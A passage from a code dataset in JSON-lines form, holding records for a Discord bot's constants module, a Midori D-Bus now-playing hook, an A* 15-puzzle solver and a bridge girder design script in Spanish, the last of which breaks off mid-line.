+{"seq_id":"34312637411","text":"\"\"\"\n# Constants and Variables Module\n\nThis module contains all constants used in the bot.\n\nAll constants are stored in a .env file. The .env file is not included in the repository for security reasons.\nHowever, you can use the .env.example file as a template to create your own .env file.\n\nThis module also contains some mutable variables/constant that are used oftenly in the bot.\n\"\"\"\n\nfrom os import getenv as ge\nfrom subprocess import check_output as chout\nfrom typing import Any, Final, cast\n\nfrom dotenv import load_dotenv as ld\n\n__version__: Final[str] = \"1.0.0\"\n\nld()\n\nDATABASE_PATH = r\"database/database.csv\"\n\n\nANILIST_CLIENT_ID: Final[str] = cast(str, ge(\"ANILIST_CLIENT_ID\"))\n\"\"\"AniList client ID\"\"\"\nANILIST_CLIENT_SECRET: Final[str] = cast(str, ge(\"ANILIST_CLIENT_SECRET\"))\n\"\"\"AniList client secret\"\"\"\nANILIST_REDIRECT_URI: Final[str] = cast(str, ge(\"ANILIST_REDIRECT_URI\"))\n\"\"\"AniList redirect URI\"\"\"\nANILIST_ACCESS_TOKEN: Final[str] = cast(str, ge(\"ANILIST_ACCESS_TOKEN\"))\n\"\"\"AniList access token\"\"\"\nANILIST_OAUTH_REFRESH: Final[str] = cast(str, ge(\"ANILIST_OAUTH_REFRESH\"))\n\"\"\"AniList OAuth refresh token\"\"\"\nANILIST_OAUTH_EXPIRY: Final[int] = cast(int, ge(\"ANILIST_OAUTH_EXPIRY\"))\n\"\"\"AniList OAuth expiry time, in seconds\"\"\"\nAUTHOR_USERID: Final[int] = cast(int, ge(\"AUTHOR_USERID\"))\n\"\"\"The bot author's user ID\"\"\"\nAUTHOR_USERNAME: Final[str] = cast(str, ge(\"AUTHOR_USERNAME\"))\n\"\"\"The bot author's username\"\"\"\nBOT_CLIENT_ID: Final[int] = cast(int, ge(\"BOT_CLIENT_ID\"))\n\"\"\"The bot's client ID\"\"\"\nBOT_SUPPORT_SERVER: Final[str] = cast(str, ge(\"BOT_SUPPORT_SERVER\"))\n\"\"\"The bot's support server invite link\"\"\"\nBOT_TOKEN: Final[str] = cast(str, ge(\"BOT_TOKEN\"))\n\"\"\"The bot's token\"\"\"\nCLUB_ID: Final[int] = cast(int, ge(\"CLUB_ID\"))\n\"\"\"MyAnimeList club ID\"\"\"\nDBGG_API_TOKEN: Final[str] = cast(str, ge(\"DBGG_API_TOKEN\"))\n\"\"\"Discord Bots API token\"\"\"\nDBL_API_TOKEN: Final[str] = cast(str, ge(\"DBL_API_TOKEN\"))\n\"\"\"Discord Bot List API token\"\"\"\nEXCHANGERATE_API_KEY: Final[str] = cast(str, ge(\"EXCHANGERATE_API_KEY\"))\n\"\"\"ExchangeRateAPI key\"\"\"\nINFINITY_API_TOKEN: Final[str] = cast(str, ge(\"INFINITY_API_TOKEN\"))\n\"\"\"Infinity Bots API token\"\"\"\nLASTFM_API_KEY: Final[str] = cast(str, ge(\"LASTFM_API_KEY\"))\n\"\"\"Last.fm API key\"\"\"\nMYANIMELIST_CLIENT_ID: Final[str] = cast(str, ge(\"MYANIMELIST_CLIENT_ID\"))\n\"\"\"MyAnimeList client ID\"\"\"\nRAWG_API_KEY: Final[str] = cast(str, ge(\"RAWG_API_KEY\"))\n\"\"\"RAWG API key\"\"\"\nSENTRY_DSN: Final[str] = cast(str, ge(\"SENTRY_DSN\"))\n\"\"\"Sentry DSN\"\"\"\nSHIKIMORI_CLIENT_ID: Final[str] = cast(str, ge(\"SHIKIMORI_CLIENT_ID\"))\n\"\"\"Shikimori client ID\"\"\"\nSHIKIMORI_CLIENT_SECRET: Final[str] = cast(str, ge(\"SHIKIMORI_CLIENT_SECRET\"))\n\"\"\"Shikimori client secret\"\"\"\nSHIKIMORI_APPLICATION_NAME: Final[str] = cast(\n str, ge(\"SHIKIMORI_APPLICATION_NAME\"))\n\"\"\"Shikimori application name\"\"\"\nSIMKL_CLIENT_ID: Final[str] = cast(str, ge(\"SIMKL_CLIENT_ID\"))\n\"\"\"SIMKL client ID\"\"\"\nSPOTIFY_CLIENT_ID: Final[str] = cast(str, ge(\"SPOTIFY_CLIENT_ID\"))\n\"\"\"Spotify client ID\"\"\"\nSPOTIFY_CLIENT_SECRET: Final[str] = cast(str, ge(\"SPOTIFY_CLIENT_SECRET\"))\n\"\"\"Spotify client secret\"\"\"\nTMDB_API_KEY: Final[str] = cast(str, ge(\"TMDB_API_KEY\"))\n\"\"\"TMDB API key\"\"\"\nTMDB_API_VERSION: Final[int] = cast(int, ge(\"TMDB_API_VERSION\"))\n\"\"\"TMDB API version\"\"\"\nTOPGG_API_TOKEN: Final[str] = cast(str, ge(\"TOPGG_API_TOKEN\"))\n\"\"\"Top.gg API token\"\"\"\nTRAKT_API_VERSION: Final[int] = cast(int, ge(\"TRAKT_API_VERSION\"))\n\"\"\"Trakt API version\"\"\"\nTRAKT_CLIENT_ID: Final[str] = cast(str, ge(\"TRAKT_CLIENT_ID\"))\n\"\"\"Trakt client ID\"\"\"\nVERIFICATION_SERVER: Final[int] = cast(int, ge(\"VERIFICATION_SERVER\"))\n\"\"\"Verification server ID\"\"\"\nVERIFIED_ROLE: Final[int] = cast(int, ge(\"VERIFIED_ROLE\"))\n\"\"\"Verified role ID\"\"\"\n\nEMOJI_ATTENTIVE: Final[str] = cast(str, ge(\"EMOJI_ATTENTIVE\"))\n\"\"\"The attentive emoji\"\"\"\nEMOJI_DOUBTING: Final[str] = cast(str, ge(\"EMOJI_DOUBTING\"))\n\"\"\"The doubting emoji\"\"\"\nEMOJI_FORBIDDEN: Final[str] = cast(str, ge(\"EMOJI_FORBIDDEN\"))\n\"\"\"The forbidden emoji\"\"\"\nEMOJI_SUCCESS: Final[str] = cast(str, ge(\"EMOJI_SUCCESS\"))\n\"\"\"The success emoji\"\"\"\nEMOJI_UNEXPECTED_ERROR: Final[str] = cast(str, ge(\"EMOJI_UNEXPECTED_ERROR\"))\n\"\"\"The unexpected error emoji\"\"\"\nEMOJI_USER_ERROR: Final[str] = cast(str, ge(\"EMOJI_USER_ERROR\"))\n\"\"\"The user error emoji\"\"\"\n\nLANGUAGE_CODE: Final[str] = cast(str, ge(\"LANGUAGE_CODE\"))\n\"\"\"Default language code\"\"\"\n\n\ndef get_git_revision_hash() -> str:\n \"\"\"\n Get the current git revision hash\n\n Returns:\n str: The current git revision hash\n \"\"\"\n return chout([\"git\", \"rev-parse\", \"HEAD\"]).decode(\"ascii\").strip()\n\n\ndef get_git_revision_short_hash() -> str:\n \"\"\"\n Get the current git revision short hash\n\n Returns:\n str: The current git revision short hash\n \"\"\"\n return chout([\"git\", \"rev-parse\", \"--short\", \"HEAD\"]\n ).decode(\"ascii\").strip()\n\n\ndef get_git_remote_url() -> str:\n \"\"\"\n Get the URL of the origin remote\n\n Returns:\n str: The URL of the origin remote\n \"\"\"\n output = chout([\"git\", \"remote\", \"get-url\", \"origin\"]).decode(\"utf-8\")\n output = output.strip()\n return output\n\n\ndef get_current_git_branch() -> str:\n \"\"\"\n Get the current git branch\n\n Returns:\n str: The current git branch\n \"\"\"\n output = chout([\"git\", \"branch\", \"--show-current\"]).decode(\"utf-8\")\n output = output.strip()\n return output\n\n\n# Call the get_current_git_branch() funct\n\n\nGIT_REMOTE = get_git_remote_url()\n\"\"\"The git remote URL\"\"\"\nGIT_BRANCH = get_current_git_branch()\n\"\"\"The git branch\"\"\"\nGIT_COMMIT_HASH = get_git_revision_hash()\n\"\"\"The git revision hash\"\"\"\nGT_HSH = get_git_revision_short_hash()\n\"\"\"The git revision short hash\"\"\"\n\nUSER_AGENT: Final[\n str\n] = f\"RyuuzakiRyuusei/1.0 ({GIT_REMOTE}/{GT_HSH}; branch:{GIT_BRANCH}; author:{AUTHOR_USERNAME}:{AUTHOR_USERID}; https://discord.com/users/{BOT_CLIENT_ID})\"\n\"\"\"The user agent\"\"\"\n\n# =============================================================================\n# About Bot\n\nAUTHOR_USER_URL = f\"https://discord.com/users/{AUTHOR_USERID}\"\n\"\"\"The bot author's user URL\"\"\"\n\nBOT_DATA: dict[str, Any] = {\n \"server_members\": {}\n}\n\"\"\"Dynamic bot data\"\"\"\n\n# =============================================================================\n# Declined GDPR notice\n\nDECLINED_GDPR: Final[\n str\n] = \"\"\"## You have not accepted the Privacy Policy!\nUnfortunately, we cannot register you without your consent. However, you can still use the bot albeit limited.\n\nAllowed commands:\n- `/profile myanimelist mal_username:`\n- `/profile anilist anilist_username:`\n- `/profile shikimori shikimori_username:`\n- `/profile lastfm lastfm_username:`\n\nIf you want to register, please use the command `/register` again and accept the consent by set the `accept_privacy_policy` option to `true`!\n\nWe only store your MAL username, MAL UID, Discord username, Discord UID, and joined date for both platforms, also server ID during registration.\nWe do not store any other data such as your email, password, or any other personal information.\nWe also do not share your data with any third party than necessary, and it only limited to the required platforms such Username.\n\n***We respect your privacy.***\n\nFor more info what do we collect and use, use `/privacy`.\n\"\"\"\n\"\"\"The declined GDPR notice, deprecated in favor of i18n\"\"\"\n\n# =============================================================================\n\n# Common errors and messages\n\nMESSAGE_INVITE: Final[\n str\n] = 'To invite me, simply press \"**Invite me!**\" button below!\\nFor any questions, please join my support server!'\n\"\"\"The invite message\"\"\"\n\nMESSAGE_WARN_CONTENTS: Final[\n str\n] = \"\"\"\n\nIf you invoked this command outside (public or private) forum thread channel or regular text channel and **Age Restriction** is enabled, please contact developer of this bot as the feature only tested in forum thread and text channel.\n\nYou can simply access it on `/support`\"\"\"\n\"\"\"The message when a user invoked a command outside forum thread channel or regular text channel\"\"\"\n\nBANNED_TAGS = [\n \"Amputation\",\n \"Anal Sex\",\n \"Ashikoki\",\n \"Asphyxiation\",\n \"Blackmail\",\n \"Bondage\",\n \"Boobjob\",\n \"Cumflation\",\n \"Cunnilingus\",\n \"Deepthroat\",\n \"DILF\",\n \"Fellatio\",\n \"Femdom\",\n \"Futanari\",\n \"Group Sex\",\n \"Handjob\",\n \"Human Pet\",\n \"Incest\",\n \"Inseki\",\n \"Irrumatio\",\n \"Lactation\",\n \"Masochism\",\n \"Masturbation\",\n \"MILF\",\n \"Nakadashi\",\n \"Pregnant\",\n \"Prostitution\",\n \"Public Sex\",\n \"Rape\",\n \"Rimjob\",\n \"Sadism\",\n \"Scat\",\n \"Scissoring\",\n \"Sex Toys\",\n \"Squirting\",\n \"Sumata\",\n \"Sweat\",\n \"Tentacles\",\n \"Threesome\",\n \"Vore\",\n \"Voyeur\",\n \"Watersports\",\n \"Omegaverse\",\n]\n\"\"\"List of tags that should be removed if found on AniList result\"\"\"\n\nTRAKT_HEADER = {\n \"Content-Type\": \"applications/json\",\n \"trakt-api-key\": TRAKT_CLIENT_ID,\n \"trakt-api-version\": f\"{TRAKT_API_VERSION}\",\n}\n\"\"\"Default Trakt API header\"\"\"\n","repo_name":"nattadasu/ryuuRyuusei","sub_path":"modules/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"15986888493","text":"import sys\n\ntry:\n import dbus\nexcept ImportError:\n print (u\"ProtocolManager.Command /echo you need to install python-dbus\")\n raise SystemExit(1)\n\nclass Midori(object):\n\n def __init__(self):\n\n session_bus = dbus.SessionBus()\n try:\n player = session_bus.get_object('org.midori.mediaHerald','/org/midori/mediaHerald')\n self.__iface = dbus.Interface(player, dbus_interface='org.freedesktop.DBus.Properties')\n self.__get_iface = True\n except dbus.exceptions.DBusException:\n print (u\"ProtocolManager.Command /echo you need to run midori extension 'Webmedia now-playing'\")\n self.__get_iface = False\n \n\n @classmethod\n def GetTrackInfos(cls):\n midori = Midori()\n if midori.__get_iface:\n properties = midori.__iface.GetAll('org.midori.mediaHerald')\n output = properties.get(\"VideoTitle\")[1:] + ' - '+ properties.get(\"VideoUri\")[0:]\n print(u\"ProtocolManager.Command /me is playing: {}\".format(output).encode(\"utf-8\"))\n return True\n return False\n","repo_name":"meebey/smuxi-hooks","sub_path":"now-playing/frontend/command-manager/command-np/engine/midori.py","file_name":"midori.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"33"} +{"seq_id":"40693849859","text":"import heapq\n\n## BLOCO CLASSE DO ESTADO E VARIÁVEIS ##\nclass Estado(object):\n matriz = []\n g = 0\n h = 0\n p = None\n identificador = 0\n\n def __lt__(self, other):\n return self.f() < other.f()\n \n def f(self):\n return self.g + self.h\n\nA = [Estado()]\nmatrizEntrada = []\nmatrizFinal = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 0]\ndicionarioAbertos = {}\ndicionarioFechados = {}\n\n## BLOCO HEURISTÍCAS ##\ndef h1(estado): #Heurística 1\n qtPecasForaDoLugar = 0\n for i in range(16):\n if (estado.matriz[i] != matrizFinal[i]):\n qtPecasForaDoLugar = qtPecasForaDoLugar +1\n \n estado.h = qtPecasForaDoLugar\n\ndef h2(estado): #Heurística 2\n qntdPecasForaSeq = 0\n #vetorPosicoes = [4, 8, 12, 13, 14, 11, 7, 3, 2, 1, 5, 9, 10, 6]\\\n vetorPosicoes = [4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 2, 7, 11]\n\n #mas oque é isso deputado ?\n\n for i in vetorPosicoes:\n if ((estado.matriz[i] +1) != estado.matriz[i +1]):\n qntdPecasForaSeq = qntdPecasForaSeq +1\n\n estado.h = qntdPecasForaSeq\n\ndef h3(estado): #Heurística 3\n matrizMap = [(0,0), (0,1), (0,2), (0,3),\n (1,0), (1,1), (1,2), (1,3),\n (2,0), (2,1), (2,2), (2,3),\n (3,0), (3,1), (3,2), (3,3)]\n vetorPerfeito = [1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15, 4, 8, 12, 0]\n \n distRetangular = 0\n for i in range(16):\n if (estado.matriz[i] != vetorPerfeito[i]):\n posicaoCorreta = vetorPerfeito.index(estado.matriz[i])\n distRetangular = distRetangular + calculadistRetangular(matrizMap[i], matrizMap[posicaoCorreta])\n\n estado.h = distRetangular \n\ndef calculadistRetangular(elementoA, elementoB):\n return (abs(elementoA[0] - elementoB[0]) + abs(elementoA[1] - elementoB[1]))\n''''\ndef h4(estado): #Heurística 4\n h1(estado)\n resultadoH1 = estado.h\n\n h2(estado)\n resultadoH2 = estado.h\n\n h3(estado)\n resultadoH3 = estado.h\n\n p1 = 0.1\n p2 = 0\n p3 = 0.9\n\n estado.h = ((p1 * resultadoH1) + (p2 * resultadoH2) + (p3 * resultadoH3)) \n\ndef h5(estado): #Heurística 5\n h1(estado)\n resultadoH1 = estado.h\n\n h2(estado)\n resultadoH2 = estado.h\n\n h3(estado)\n resultadoH3 = estado.h\n\n estado.h = max(resultadoH1, resultadoH2, resultadoH3)\n'''\n## BLOCO FUNÇÕES AUXILIARES ##\ndef r(estadoPai): \n pos_zero = estadoPai.matriz.index(0)\n\n if ((pos_zero -4) >= 0): #Rotacao de Cima para Baixo\n rotacionaEstado(estadoPai, pos_zero, -4)\n \n if ((pos_zero +4) <= 15): #Rotacao de Baixo para Cima\n rotacionaEstado(estadoPai, pos_zero, +4)\n\n modPos = (pos_zero%4)\n if (modPos > 0): #Rotacao da Esquerda para Direita\n rotacionaEstado(estadoPai, pos_zero, -1)\n\n if (modPos < 3): #Rotacao da Direita para Esquerda\n rotacionaEstado(estadoPai, pos_zero, +1)\n\ndef rotacionaEstado(estadoOriginal, pos_zero, deslocamento):\n rotacao = estadoOriginal.matriz[:] #Copia a Matriz\n posTroca = (pos_zero + deslocamento)\n rotacao[pos_zero], rotacao[posTroca] = rotacao[posTroca], rotacao[pos_zero] #Troca os elementos\n\n idMatrizRotacao = calculaHash(rotacao)\n estadoExistente = obterEstado(dicionarioAbertos, idMatrizRotacao)\n posGPai = (estadoOriginal.g +1)\n if (estadoExistente != -1):\n if (estadoExistente.g > posGPai):\n estadoExistente.p = estadoOriginal\n estadoExistente.g = posGPai\n adicionaEstadoNoHeap(estadoExistente)\n else:\n estado = Estado()\n estado.matriz = rotacao\n estado.p = estadoOriginal\n estado.g = posGPai\n estado.identificador = idMatrizRotacao\n\n if (obterEstado(dicionarioFechados, idMatrizRotacao) == -1):\n h2(estado) #Calcula a heurística\n adicionaNoDicionario(dicionarioAbertos, estado)\n adicionaEstadoNoHeap(estado)\n\ndef adicionaEstadoNoHeap(estado):\n heapq.heappush(A, estado)\n\ndef menorEstadoAberto():\n return heapq.heappop(A)\n\ndef calculaHash(matrizEstado):\n return tuple(matrizEstado)\n\ndef adicionaNoDicionario(dicionario, estado):\n dicionario[estado.identificador] = estado\n\ndef removeDoDicionario(dicionario, estado):\n try:\n del dicionario[estado.identificador]\n except:\n pass\n\ndef obterEstado(dicionario, identificador):\n try:\n return dicionario[identificador]\n except:\n return -1\n\n## BLOCO ALGORITMO A* ##\nvalores = input()\nfor x in valores.split():\n matrizEntrada.append(int(x))\n\nA[0].matriz = matrizEntrada\nA[0].identificador = calculaHash(matrizEntrada)\nadicionaEstadoNoHeap(A[0])\nidMatrizFinal = calculaHash(matrizFinal)\n\nwhile True:\n\n v = menorEstadoAberto()\n if (v.identificador == idMatrizFinal):\n break\n\n removeDoDicionario(dicionarioAbertos, v) \n adicionaNoDicionario(dicionarioFechados, v)\n\n r(v) #Calcula os sucessores\n\nprint(v.g)\n","repo_name":"vhpavoni/MOA","sub_path":"AgotimoAestrela.py","file_name":"AgotimoAestrela.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9812313609","text":"from numpy.lib.shape_base import vsplit\nimport makepath\n\nfrom pyFEM import Structure\nfrom docxtpl import DocxTemplate\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pprint\n\npp = pprint.PrettyPrinter(sort_dicts=False)\n\ncamion_CC14 = {\n 'separacion_ejes': [4.3, 4.3],\n 'peso_ejes': [40, 160, 160],\n 'carga_carril': 10.3,\n 'separacion_ruedas': 1.8,\n 'separacion_borde': 0.6\n}\n\ntandem_CC14 = {\n 'separacion_ejes': [1.2],\n 'peso_ejes': [125, 125],\n}\n\n# tabla 3.6.1.1.2-1 -- Factores de presencia múltiple, m\nfactor_presencia_multiple = {1: 1.2, 2: 1}\n\n\ndef superestructura(params={}):\n # losa: losa\n # carpetaAsfaltica: carpeta asfaltica\n # Nb: cantidad de vigas, -\n # vigas: vigas de la superestructura\n # S: separación entre vigas, m\n # S_overhang: voladizo, m\n # L: longitud de la superestructura, m\n\n # svigas = 2\n # bf = 'bf'\n # elosa = \n # pesoconcreto = \n\n nb = params['nb'] = params.get('nb', 4) # numero de vigas \n nl = params['nl'] = params.get('nl', 2) # numero de carriles cargados\n fy = params['fy'] = params.get('fy', 420000) # acero en kPa\n fc = params['fc'] = params.get('fc', 28000) # concreto en kPa\n Es = params['Es'] = params.get('Es', 200000000) # modulo de elasticidad del acero en kPa \n tiposeccion = params['tiposeccion'] = params.get('tiposeccion', 'e') # tipo de seccion del puente\n frf = params['frf'] = params.get('frf', 0.9) # factor de resistencia por flexion y cortante\n factormodcarga = params['factormodcarga'] = params.get('factormodcarga', 1) # factor de modificacion de carga\n L = params['L'] = params.get('L', 14) # Longitud de la luz\n aapoyo = params['aapoyo'] = params.get('aapoyo', 0.4) # ancho del apoyo\n svigas = params['svigas'] = params.get('svigas', 2) # Separacion entre vigas\n distvoladizo = params['distvoladizo'] = params.get('distvoladizo', 1) # distancia del voladizo desde el centro de la viga\n baseviga = params['baseviga'] = params.get('baseviga', 0.4) # base de la viga\n hviga = params['hviga'] = params.get('hviga', 0.8) # altura de la viga\n elosa = params['elosa'] = params.get('elosa', 0.2) # espesor de la losa\n pesoconcreto = params['pesoconcreto'] = params.get('pesoconcreto', 24) # peso especifico del concreto\n pesoasfalto = params['pesoasfalto'] = params.get('pesoasfalto', 21.57) # peso especifico del asfalto\n pesobaranda = params['pesobaranda'] = params.get('pesobaranda', 0.6865) # peso especifico de la baranda\n nbarandas = params['nbarandas'] = params.get('nbarandas', 2) # numero de barandas\n nbordillo = params['nbordillo'] = params.get('nbordillo', 2) # numero de bordillos\n seccionbordillo1 = params['seccionbordillo1'] = params.get('seccionbordillo1', 0.2) # ancho base bordillo\n seccionbordillo2 = params['seccionbordillo2'] = params.get('seccionbordillo2', 0.2) # ancho corona bordillo\n seccionbordillo3 = params['seccionbordillo3'] = params.get('seccionbordillo3', 0.3) # alto bordillo\n ecarpetaasf = params['ecarpetaasf'] = params.get('ecarpetaasf', 0.08) # espesor carperta asfaltica\n \n IM = params['IM'] = params.get('IM', 1.33) # factor de amplificacion dinamica de carga\n n = params['n'] = params.get('n', 1) # Relacion modular\n b1 = params['b1'] = params.get('b1', 2.2) # Distancia para el calculo del factor de distribucion regla de la palanca\n b2 = params['b2'] = params.get('b2', 0.4) # Distancia para el calculo del factor de distribucion regla de la palanca\n rec = params['rec'] = params.get('rec', 0.1) # recubrimiento del acero\n rbarra = params['rbarra'] = params.get('rbarra', 8) # referencia de la barra para flexion\n rbarras = params['rbarras'] = params.get('rbarras', 3) # referencia de la barra para superficie\n rbarrae = params['rbarrae'] = params.get('rbarrae', 4) # referencia de la barra para estribos\n abarra = params['abarra'] = params.get('abarra', 0.000510) # area de la barra en metros para flexion\n abarras = params['abarras'] = params.get('abarras', 0.000071) # area de la barra en metros para superficie\n abarrae = params['abarrae'] = params.get('abarrae', 0.000129) # area de la barra en metros para estribos\n pb1 = params['pb1'] = params.get('pb1', 0.85) # valor para el calculo dela profundidad del bloque de compresiones\n duc = params['duc'] = params.get('duc', 0.003) # deformacion unitaria del concreto\n duas = params['duas'] = params.get('duas', 0.005) # deformacion unitaria del acero supuesta\n y3 = params['y3'] = params.get('y3', 0.75) # valor del concreto para el momento requerido por la combinacion de carga\n y1 = params['y1'] = params.get('y1', 1.6) # valor del concreto para el momento requerido por la combinacion de carga\n alpha = params['alpha'] = params.get('alpha', 90) # angulo para estribos verticales\n \n Ec = params['Ec'] = 4800 * (fc / 1000) ** 0.5 #Modulo de elasticidad del concreto en MPa\n hmin = params['hmin'] = 0.07*L # altura minima\n hseccion = params['hseccion'] = hviga + elosa # altura de la seccion compuesta\n bf = params['bf'] = (svigas/2) + distvoladizo # ancho efectico de la aleta\n DClosa = params['DClosa'] = bf*elosa*pesoconcreto # carga de la losa\n DCviga = params['DCviga'] = baseviga*hviga*pesoconcreto # carga de la viga\n DCest = params['DCest'] = DClosa + DCviga # carga de la estructura\n DCbaranda = params['DCbaranda'] = (pesobaranda*nbarandas)/nb # carga de la baranda\n DCbordillo = params['DCbordillo'] = ((((seccionbordillo1+seccionbordillo2)/2)*seccionbordillo3)*pesoconcreto*nbordillo)/nb # carga del bordillo\n DCper = params['DCper'] = DClosa + DCviga + DCbordillo + DCbaranda # carga DC\n DW = params['DW'] = ecarpetaasf*bf*pesoasfalto # carga del asfalto \n MDCest = params['MDCest'] = (DCest*(L**2))/8 # Momento maximo estructura\n MDW = params['MDW'] = (DW*(L**2))/8 # Momento maximo del asfalto\n MDCvol = params['MDCvol'] = ((DCbordillo + DCbaranda)*(L**2))/8 # Momento maximo del voladizo\n MDCper = params['MDCper'] = MDCest + MDCvol # Momento maximo carga DC\n VDCest = params['VDCest'] = (DCest*L)/2\n VDCvol = params['VDCvol'] = ((DCbordillo + DCbaranda)*L)/2\n VDCper = params['VDCper'] = VDCest + VDCvol\n\n A = params['A'] = baseviga*hviga # Area de la viga seccion simple\n y = params['y'] = hviga/2 # centroide la viga seccion simple\n Al = params['Al'] = bf*elosa # Area de la losa seccion simple\n yl = params['yl'] = elosa/2 # centroide la losa seccion simple\n Ac = params['Ac'] = A + Al # Area de la seccion compuesta\n yc = params['yc'] = ((A*y)+(Al*(yl+hviga)))/Ac # centroide la seccion compuesta\n I = params['I'] = (baseviga*(hviga**3))/12 # inercia de la viga sección simple\n Il = params['Il'] = (bf*(elosa**3))/12 # inercia de la losa sección simple\n Ic = params['Ic'] = (I +(A*((yc-y)**2))) + (Il +(Al*(((yl+hviga)-yc)**2))) # inercia de la sección compuesta\n Snc = params['Snc'] = I/y # modulo de la seccion simple\n Sc = params['Sc'] = Ic/yc # modulo de la seccion compuesta\n \n de = params['de'] = distvoladizo - seccionbordillo1 # distancia entre eje de la viga exterior y la cara interna de la bordillo\n eg = params['eg'] = hseccion-(elosa/2)-(hviga/2) # distancia entre centroides de la viga y la losa\n kg = params['kg'] = n*(I + (A*(eg**2))) # Parametro para el calculo del factor de distribucion\n mg1i = params['mg1i'] = 0.06 + ((svigas/4.3)**0.4)*((svigas/L)**0.3)*((kg/(L*elosa**3))**0.1) # factor de distribucion para momento\n mg2i = params['mg2i'] = 0.075 + ((svigas/2.9)**0.6)*((svigas/L)**0.2)*((kg/(L*elosa**3))**0.1) # factor de distribucion para momento\n g1e = params['g1e'] = (b1 + b2)/(2*svigas) # factor de distribucion sin mayorar por el factor de presencia multiple\n mg1e = params['mg1e'] = 1.2*g1e # factor de distribucion para momento\n mg2e = params['mg2e'] = (0.77 + (de/2.80))*mg2i # factor de distribucion para momento\n \n mg1ic = params['mg1ic'] = 0.36 + (svigas/7.6) # factor d7e distribucion para cortante\n mg2ic = params['mg2ic'] = 0.2 + (svigas/3.6)-((svigas/10)**2) # factor de distribucion para cortante\n mg1ec = params['mg1ec'] = 1.2*g1e # factor de distribucion para cortante\n mg2ec = params['mg2ec'] = (0.60 + (de/3))*mg2ic # factor de distribucion para cortante\n \n model = create_model(params)\n\n momentos_flectores_cargas_estructura(params, model)\n fuerzas_internas_cargas_permanentes(params, model)\n momentos_flectores_carga_viva_vehicular(params, model)\n combinaciones_carga(params, model)\n combinaciones_cargav(params, model)\n\n MLv = params['MLv'] = params['MLVmax'] # momento generado por el vehiculo\n MLc = params['MLc'] = params['MLCmax'] # momento generado por el carril\n \n MLLIM = params['MLLIM'] = (IM*MLv) + MLc # Momento maximo carga viva vehicular\n\n\n MLLIMp = params['MLLIMp'] = MLLIM*min(max(mg1i,mg2i),max(mg2e,mg1e)) # momento maximo debido a la carga viva con el factor de distribucion maximo hallado\n MUI = params['MUI'] = factormodcarga*((1.25*MDCper)+(1.5*MDW)+(1.75*MLLIMp)) # momento ultimo para resistencia I\n \n nbarra = params['nbarra'] = params.get('nbarra', 2)\n Sbarra = params['Sbarra'] = params.get('Sbarra', 0.25)\n\n As = params['As'] = nbarra*abarra\n rece = params['rece'] = rec + 0.03\n d = params['d'] = hseccion - rece # altura efectiva\n p = params['p'] = As/(baseviga*d)\n a = params['a'] = (p*d*fy)/(0.85*fc) # posicion del eje neutro\n Mn = params['Mn'] = frf*As*fy*(d - (a/2))\n \n d2 = params['d2'] = d - Sbarra\n p2 = params['p2'] = As/(baseviga*d2)\n a2 = params['a2'] = (p2*d2*fy)/(0.85*fc) # posicion del eje neutro\n Mn2 = params['Mn2'] = frf*As*fy*(d2 - (a2/2))\n \n d3 = params['d3'] = d2 - Sbarra\n p3 = params['p3'] = As/(baseviga*d3)\n a3 = params['a3'] = (p3*d3*fy)/(0.85*fc) # posicion del eje neutro\n Mn3 = params['Mn3'] = frf*As*fy*(d3 - (a3/2))\n \n d4 = params['d4'] = d3 - Sbarra\n p4 = params['p4'] = As/(baseviga*d4)\n a4 = params['a4'] = (p4*d4*fy)/(0.85*fc) # posicion del eje neutro\n Mn4 = params['Mn4'] = frf*As*fy*(d4 - (a4/2))\n \n \n\n \n k = params['k'] = MUI/(bf*(d**2)) # parametro K para la cuantia\n m = params['m'] = fy/(0.85*fc) # parametro m para la cuantia\n \n # p = params['p'] = (1/m)*(1-(1-((2*m*k)/(frf*fy)))**0.5) # cuantia\n \n # As = params['As'] = p*d*bf # acero de refuerzo\n \n # nbarra = params['nbarra'] = np.ceil(As/abarra) # numero de barras a usar\n \n \n pc = params['pc'] = (As*fy)/(0.85*fc*bf*pb1) # profundidad del bloque de compresiones\n dua = params['dua'] = (d-pc)*(duc/pc) # deformacion unitaria del acero\n Ast = params['Ast'] = nbarra*abarra # area de acero total\n Askmin = params['Askmin'] = ((d*1000) - 760) # area del acero de superficie minimo\n Askmax = params['Askmax'] = ((Ast*1000000)/4) # area del acero de superficie maximo\n Ssup = params['Ssup'] = d/6 # espaciamiento de barras superficiales\n dv1 = params['dv1'] = 0.9*d\n dv2 = params['dv2'] = 0.72*hseccion\n dv = params['dv'] = max(dv1,dv2)\n distc = params['distc'] = max(dv1,dv2) + (aapoyo/2)\n\n VDCmax = params['VDCmax'] \n VDW = params['VDW'] = params.get('VDW', 0)\n VLv = params['VLv'] = params['VLVmax']\n VLc = params['VLc'] = params['VLCmax']\n \n MUIdv = params['MUIdv'] = params.get('MUIdv', 625.66) # momento ultimo a cierta distancia del apoyo, debe ser calculado\n nbarradv = params['nbarradv'] = params.get('nbarradv', 4)\n\n VLLIM = params['VLLIM'] = (IM*VLv) + VLc # Cortante maximo carga viva vehicular\n \n\n VLLIMp = params['VLLIMp'] = VLLIM*min(max(mg1ic,mg2ic),max(mg2ec,mg1ec)) \n VUI = params['VUI'] = factormodcarga*((1.25*VDCmax)+(1.5*VDW)+(1.75*VLLIMp)) # cortante ultimo para resistencia I\n VN = params['VN'] = 0.25*fc*baseviga*dv\n vu = params['vu'] = VUI/(frf*baseviga*dv)\n duas = params['duas'] = ((MUIdv/dv)+VUI)/(Es*nbarradv*abarra)\n\n angulo1 = params['angulo1'] = 29 + (3500*duas)\n angulo2 = params['angulo2'] = 4.8/(1 + (750*duas))\n Vc = params['Vc'] = 0.083*angulo2*((fc/1000)**0.5)*baseviga*dv\n Vs = params['Vs'] = (VUI/frf) - (Vc*1000)\n\n pcv = params['pcv'] = (nbarradv*abarra*(fy/1000))/(0.85*(fc/1000)*bf) # profundidad del bloque de compresiones en la seccion critica por cortante\n dvc = params['dvc'] = d - 